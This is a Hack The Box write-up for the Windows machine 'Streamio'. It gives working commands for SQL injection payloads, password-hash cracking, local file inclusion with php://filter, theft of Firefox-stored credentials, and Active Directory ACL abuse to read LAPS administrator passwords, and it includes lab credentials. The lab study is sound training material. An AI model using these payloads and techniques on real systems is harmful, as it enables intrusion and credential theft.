Streamio

March 15, 2025

---

Created by	Page	Difficulty	OS
JDgodd & nikk37	Hack The Box	Medium	Windows

---

• I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found

    nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.158 -oG scan
    /opt/extractports scan
    nmap -p53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49704 -sCV -Pn 10.10.11.158 -oN ports
  

  

• I found the domain streamIO.htb and watch.streamIO.htb add it to the file in the hosts file

• I list the mails servers and find a new domain dc.streamIO.htb and add it to the hosts file

    dig @10.10.11.158 streamIO.htb mx
  

  

• I enumerate system users using kerbrute and a dictionary with common user names. I find Administrator and martin. I’m trying to get the password of these users but I can’t get it.

    kerbrute userenum --dc 10.10.11.158 -d streamIO.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
  

  

• I continue to look at web pages using the different domains I have found previously.

  

• After searching through the web pages, nothing relevant can be found. I decide to list files that have a number of typical extensions and I find search.php

    ffuf -c -t 200 -w /usr/share/wordlists/dirb/common.txt  -u https://watch.streamio.htb/FUZZ -e .txt,.php,.js,.html,.py,.sh,.asp,.aspx,.bak
  

• This page shows a list of movies and allows us to perform searches. I try to do a search by putting a single quotation mark and I notice that no movie is returned. I interpret that it can have caused an internal error that I cannot see but that can be susceptible to code injections.

  

• Being against a MS SQL I decide to consult how many columns the query is composed of and I notice that it is composed of 6 and the content of columns 2 and 3 I can see them.

10' union select 1,2,3,4,5,6-- -

• Knowing I am doing different queries to get information about the structure of the DDBB and its content.

#DDBB name
10' union select 1,schema_name,3,4,5,6 from information_schema.schemata-- -
#Table names
10' union select 1,table_name,3,4,5,6 from information_schema.tables-- -
#Column names 
10' union select 1,concat(column_name,',',table_name),3,4,5,6 from information_schema.columns-- -
#content of table users 
10' union select 1,concat(username,',',password),3,4,5,6 from users-- -

• I get to list the content of the users table containing the username and password columns. It seems that the password is encrypted in ms5. I try to break the passwords and succeed for a few of them.

    john -w=/usr/share/wordlists/rockyou.txt credentialsMD5 --format=Raw-MD5
  

• I try the credentials I found in the streamIO.htb login panel and I get access with the user yoshihide. I can see the admin panel but I can’t find anything relevant.

• I notice that when I move through the parts of the admin panel in the url only one parameter changes. I decide to brute force that part to look for new available pages. find a new page when I put “debug”.

    ffuf -c -t 200 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: PHPSESSID=61ajbbchdgvc3oobbqh0ahsi3t" -u 'https://streamio.htb/admin/index.php?FUZZ=' | grep -v 'tatus: 200, Size: 1678, Words: 85,'
  

• I try to read internal system files (LFI) and I manage to read files.

    https://streamio.htb/admin/index.php?debug=c:\Windows\System32\Drivers\etc\hosts
  

• Since I can read files, I decide to apply a wrapper so that the pages are not interpreted and I can see their content.

https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=..\index.php
https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=..\about_include.php
https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=master.php
https://streamio.htb/admin/index.php?debug=php://filter/convert.base64-encode/resource=index.php

• Inside the index.php file I find some credentials to connect to the DDBB. I realize that in this case a different database is used than the one I was using in the previous part so when I have access it would be interesting to consult these new tables.

  

• I set up a server to share a richero containing a revershell by php. Thanks to this file I manage to get a revershell

  

• With this reverse shell I am the user yoshihide and I can read the first flag.

• Once inside the system, we can consult the contents of the database that I have found and that I could not consult before.

    sqlcmd -S localhost -d  STREAMIO -U db_admin -P B1XXXXXXXXX90  -Q "SELECT name, database_id from sys.databases;exit;"
    sqlcmd -S localhost -d  STREAMIO -U db_admin -P B1XXXXXXXXX90  -Q "use STREAMIO; SELECT name from sys.tables;"
    sqlcmd -S localhost -d  STREAMIO -U db_admin -P B1XXXXXXXXX90  -Q "select * from STREAMIO.dbo.users;"
    sqlcmd -S localhost -d  STREAMIO -U db_admin -P B1XXXXXXXXX90  -Q "select * from streamio_backup.dbo.users;"
  

• I find in the other database the same tables but they contain different users. I try to get the passwords in clear text and I get the one for user nikk37.

  

• I connect to the system via WINRM with the user nikk37 and I manage to read the first flag.

evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_XXXXXXXXXXXXXcom'

• I look for potential ways to escalate privileges. For that I use winpeas to enumerate the system. It shows me the existence of a .db file in a firefox path. This points to obtain the credentials stored in the browser.

• In order to do this I download the key4.db file from firefox along with loggins.json. With these two files and using firepwd I can extract the stored credentials.

    python firepwd.py -d ./
  

  

• I validate the credentials and I see that the user JDgodd’s credentials are correct and I can connect to the system.
• I keep listing potential routes with bloodhound and find one. This user has “WriteOwner” permissions on the “Core Staff” group, so we can be included in the group.

• This group has “ReadLAPSPASSWORD” permissions. It allows to read the Local Administrator Solution password. This password is stored in the attribute “ms-MCS-AdmPwd”.

  

    Import-module .\PowerView.ps1
  	
    $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword) 
  	 
    Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -PrincipalIdentity 'JDgodd'
    Add-DomainGroupMember -Identity 'Core Staff' -Members 'JDgodd' -Credential $Cred -Verbose
  	
    ldapsearch -x -H ldap://10.10.11.158 -D  "JDgodd@streamio.htb" -w JDg0dd1s@d0p3cr3@t0r -b "dc=streamio,dc=htb" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 
  

• I get the password of the administrator user, I connect via WINRM to the system and I manage to read the second flag